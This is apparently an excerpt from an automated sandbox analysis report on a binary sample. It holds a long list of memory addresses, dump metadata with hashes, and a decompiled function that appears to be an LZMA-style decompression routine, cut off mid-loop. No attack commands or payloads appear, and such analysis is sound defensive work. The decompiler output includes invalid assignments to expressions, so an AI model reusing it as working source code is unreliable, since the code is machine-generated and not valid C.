                                            0x00406a77
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406abf
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aea
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406aef
                                            0x00406af6
                                            0x00406af9
                                            0x00000000
                                            0x00406afb
                                            0x00000000
                                            0x00406afb
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00000000
                                            0x00000000
                                            0x00406b3b
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00406b60
                                            0x00406b60
                                            0x00406b66
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00000000
                                            0x00406b07
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b83
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bae
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bb3
                                            0x00406bba
                                            0x00406bbd
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00406c1c
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x00000000
                                            0x00407048
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x0040710c
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00000000
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00406d5a
                                            0x00406d5d
                                            0x00406d60
                                            0x00406d62
                                            0x00406d64
                                            0x00406d64
                                            0x00406d65
                                            0x00406d68
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d80
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407065
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x00000000
                                            0x004071a1
                                            0x0040706f
                                            0x00407072
                                            0x00407075
                                            0x00407079
                                            0x0040707c
                                            0x00407082
                                            0x00407084
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x00000000
                                            0x00000000
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00406cd0
                                            0x00406cd0
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x00406f54
                                            0x00407189
                                            0x004071ab
                                            0x004071b1
                                            0x004071b3
                                            0x004071ba
                                            0x004071bc
                                            0x004071c3
                                            0x004071c7
                                            0x00000000
                                            0x004067b8
                                            0x004071c0
                                            0x004071c0
                                            0x00000000
                                            0x004071c0
                                            0x0040700d
                                            0x00407093
                                            0x00407099
                                            0x0040709c
                                            0x0040709f
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070d3
                                            0x004070d6
                                            0x004070da
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070be
                                            0x004070c3
                                            0x004070c5
                                            0x004070c8
                                            0x004070c8
                                            0x004070ea
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x004070ec
                                            0x004070ea
                                            0x00000000
                                            0x00406f5f

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                            • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                                            • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                            • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
